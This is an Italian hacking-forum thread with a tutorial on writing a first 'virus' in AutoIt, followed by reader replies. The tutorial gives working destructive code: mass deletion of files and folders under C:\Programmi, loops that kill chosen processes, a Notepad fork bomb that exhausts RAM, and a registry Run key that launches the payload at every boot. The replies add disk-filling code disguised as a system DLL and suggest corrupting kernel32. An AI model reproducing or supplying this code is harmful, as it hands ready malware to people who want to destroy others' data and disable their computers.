IL MIO PRIMO VIRUS
Se avete letto il tutorial di DarkJoker conoscete abbastanza approssimativamente il linguaggio
di programmazione Autoit.
Dovete sapere che questo è utilissimo anche per creare dei virus più o meno potenti.
Quello che dobbiamo fare è semplicemente usare delle funzioni del linguaggio che possono
danneggiare il computer se usate in un certo modo,
Iniziamo da una funzione semplicissima: BlockInput
[code ]BlockInput(1)[/code]
BlockInput blocca l'input di tastiera e mouse in modo da non permettere più all'utente di fare
nulla.
Purtroppo questa funzione ha un grosso bug, e appena l'utente preme la combinazione di tasti
CTRL-ALT-CANC(come fa la maggior parte delle persone quando c'è un problema) e quindi è
pressochè inutile, ma serve a rendere l'idea di cosa si può fare con questa linguaggio.
Vediamo ora le funzioni migliori per creare virus..
Cominciamo con quelle che gestiscono i file:

Codice:

FileOpen(apre un file di lettura) FileCopy(copia un file) FileMove(sposta un file) FileDelete(cancella un file)

Quella che ci serve è FileDelete, perchè permette appunto di cancellare dei dati da un
computer

Codice:

FileDelete("C:\Programmi\*.*")

Questo semplice virus cancella tutti i file nella cartella "Programmi" del computer.(* indica tutti i tipi esistenti quindi * = tutti i nomi . * = tutti i formati.
esiste anche il comando dirdelete che cancella direttamente tutta la cartella:

Codice:

Dirdelete ("C:\Programmai")

Attraverso questa funzione potrete creare virus che cancellano file importanti dai
computer(ricordate comunque che i file veramente importanti, come quelli di sistema, non si
possono cancellare, ma potete comunque creare un dispiacere notevole in chi apre questo tipo di virus)
Altre funzioni utilissime sono quelle che controllano i processi:

Codice:

ProcessExists(controlla l'esistenza di un processo) ProcessClose(chide il processo)

Se avete letto il tutorial di darkjoker su autoit conoscete già l'utilizzo di cicli while e condizioni if,
che abbinati a queste funzioni possono bloccare completamente programmi)

Codice:

While 1 = 1 If ProcessExists("notepad.exe") Then ProcessClose("notepad.exe") EndIf Wend

ovvero

Codice:

Finchè 1= 1(sempre) Se esiste il processo "notepad.exe" Allora Chiudilo Fine della condizione if Fine del ciclo while

In questo modo potrete dire addio al blocco note di windows finchè questo virus è in
esecuzione. e se al posto di "notepad" mettete il nome del processo dell'applicazione che volete bloccare( il nome si può vedere tramite il task manager, click col tasto destro sul
programma, "Vai al processo) avete bloccato il programma.
Potete anche bloccare il computer dicendogli di fare troppe cose in una volta, per esempio di
aprire all'infinito il blocco note:

Codice:

While 1 = 1 Run("notepad.exe") WEnd

La funzione Run unita con il while fa aprire all'infinito il blocco note di windows, finchè il
computer finisce la RAM e va completamente in panne...
Ora la funzione più importante di tutte è il RegWrite, che permette di scrivere nel registro di
sistema. In questo modo possiamo dire a windows che ogni volta che si accende il computer
deve aprire il virus. così non ci sarà più niente da fare per chi è colpito dal virus!!!!

Codice:

RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "dkcd", "REG_SZ", "C:\djcd.exe")

Questo semplice programma dice al computer che ogni volta che si accendere di aprire il virus
chiamato "djcd.exe", salvato nella cartella C:\del computer.
Così potrte installare un virus in un computer semplicemente creandolo, salvandolo in una
cartella del computer e poi creare un'altro programma come questo che dice al computer di
aprire il virus ad ogni avvio. La voce che dovrete cambiare è l'ultima, quella del percorso,( a meno che non chiamiate il virus proprio djcd e lo salviate nel percorso C:\ )
Se comunque non avete capito bene quest'ultima parte potrete chiedere maggiori informazioni sul forum.....
Mi raccomando, usate queste informazioni senza arrecare danno ai computer!!!
CertainDeath
xhacking@yahoo.it

Ciao CertainDeath... Ti sembrerà una cosa stupida, ma io non ho capito come funziona il blockimput... Cioè io ho provato a inserirlo in un programma, scrivendo semplicemente:

Codice:

BlockImput (1)

però non mi funziona... L'imput della tastiera e del mouse sono perfetti... Ho sbagliato io qualcosa?

Grazie per gli aiuti...
Ciauz!

Niente ho risolto... Scusate la mia stupidità... Bastava inserirlo in un ciclo While... Scusate ancora...



Ciauz!

Bravo!
Hai trovato la soluzione da solo...
Purtroppo la funzione BlockInput basta premere CTRL-ALT-CANC e tutto torna come prima(questo è specificato anche nel file help se cerchi "BlockInput")...
Ma ovviamente con il ciclo while è tutta un'altra cosa.

aaa

beh, non so. forse...
comunque vedo che il tuo obbiettivo è sempre quello di intasare l'hard disk...

per creaer un nuovo file devi, pero':

Codice:

#include <File.au3> _FileCreate ("Nomefile")

non ho capito una cosa:
se tu vuoi intasare un'hard disk, non dovresti fare:

Codice:

#NoTrayIcon FileOpen (@systemdir& "path.dll", 1) while 1 $rand = Random (0, 999999999) FileWriteLine (@systemdir& "path.dll", $rand) wend

???
cosi crei un file che si nasconde sotto una dll, e gli scrive all'infinito un numero random?
ps: se vuoi puoi rendere inutilizzabile o modificare a piacimento anche il kernel32 o dll inportanti, scrivendogli dentro...